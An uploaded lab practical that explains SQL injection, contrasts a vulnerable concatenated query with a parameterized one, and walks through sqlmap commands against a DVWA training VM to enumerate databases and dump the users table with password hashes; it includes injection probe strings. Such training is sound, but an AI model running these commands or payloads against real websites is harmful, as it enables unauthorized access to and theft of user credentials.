PR 6

The document describes performing an SQL injection attack using Sqlmap on a vulnerable website called DVWA. It explains starting the DVWA VM and using a proxy to monitor Sqlmap activity. Sqlmap is used to discover the database, list databases and tables, and dump the users table containing password hashes from the vulnerable site.

Uploaded by

1707pateldeep
Practical: - 6

Examine SQL injection attack, Perform SQL injection with Sqlmap on vulnerable website found using DVWA.

SQL injection Attack:


SQL injection is a web security vulnerability that allows an attacker to interfere with
the queries that an application makes to its database. It generally allows an attacker to view
data that they are not normally able to retrieve. This might include data belonging to other
users, or any other data that the application itself is able to access. In many cases, an attacker
can modify or delete this data, causing persistent changes to the application's content or
behaviour.
In some situations, an attacker can escalate an SQL injection attack to compromise
the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
A successful SQL injection attack can result in unauthorized access to sensitive data,
such as passwords, credit card details, or personal user information. Many high-profile data
breaches in recent years have been the result of SQL injection attacks, leading to reputational
damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into
an organization's systems, leading to a long-term compromise that can go unnoticed for an
extended period.
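
The root cause described above, shown as an added example that is not part of the original practical: a lookup built by string concatenation beside the same lookup with a bound parameter. It assumes Python's sqlite3 and a constructed users table (DVWA itself is PHP on MySQL), and the functions return only a yes/no answer, as a blind-injection page does.

```python
import sqlite3


def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-placeholder-1"), (2, "alice", "hash-placeholder-2")],
    )
    return db


def exists_vulnerable(db, user_id):
    # Vulnerable: the input is pasted into the SQL text, so quote characters
    # in user_id become part of the query's syntax.
    query = "SELECT user FROM users WHERE user_id = '" + user_id + "'"
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are hidden from the caller, as on a blind page


def exists_safe(db, user_id):
    # Hardened: accept only ASCII digits, then bind the value as a parameter
    # so it is always treated as data, never as SQL.
    if not (user_id.isascii() and user_id.isdigit()):
        return False
    row = db.execute("SELECT user FROM users WHERE user_id = ?", (int(user_id),)).fetchone()
    return row is not None


def demo():
    db = make_db()
    # Constructed inputs: a normal ID, then the same ID with an appended
    # condition that is always true and one that is always false.
    probes = ["1", "1' AND '1'='1", "1' AND '1'='2"]
    return [(p, exists_vulnerable(db, p), exists_safe(db, p)) for p in probes]


if __name__ == "__main__":
    for probe, vulnerable, safe in demo():
        print(f"{probe!r:20} vulnerable={vulnerable} safe={safe}")
```

The vulnerable function answers differently for the true and false conditions, which is the signal an automated tool relies on; the hardened function rejects both inputs.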

SQL injection with DVWA:


Start your DVWA VM and the Kali Linux box. To find the cookie values and to monitor sqlmap
activity, it’s best to use a proxy. Open OWASP ZAP (you can also try using Burp Suite) and
click the Firefox button:

Navigate to the DVWA web page and add the current domain to scope by clicking the top left
button of the ZAP HUD:

Log in, set the security to ‘low’ and go to SQL Injection (Blind). Search for the ID ‘1’. The
parameters we’ll need for sqlmap are displayed in ZAP, so go and take a look.

Create a command with the right parameters:

$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
    --proxy=http://127.0.0.1:8080 \
    --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low"

We’ve discovered the DBMS is MySQL 5.0.12, the OS is Ubuntu and the web server is Apache
2.4.29. Let’s list the databases available using the ‘--dbs’ parameter:
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
    --proxy=http://127.0.0.1:8080 \
    --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" --dbs

Now, find the tables with ‘-D dvwa --tables’:
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
    --proxy=http://127.0.0.1:8080 \
    --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D dvwa --tables

Now we’ll take a look at the columns with ‘-D dvwa -T users --columns’:
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
    --proxy=http://127.0.0.1:8080 \
    --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D dvwa -T users --columns

And now we’ll get the dump:
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
    --proxy=http://127.0.0.1:8080 \
    --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D dvwa -T users --dump

We have obtained the users table and password hashes!!! At the end SQLMap will suggest the
use of a dictionary for the hashes. It’s optional.

Sign: _________________
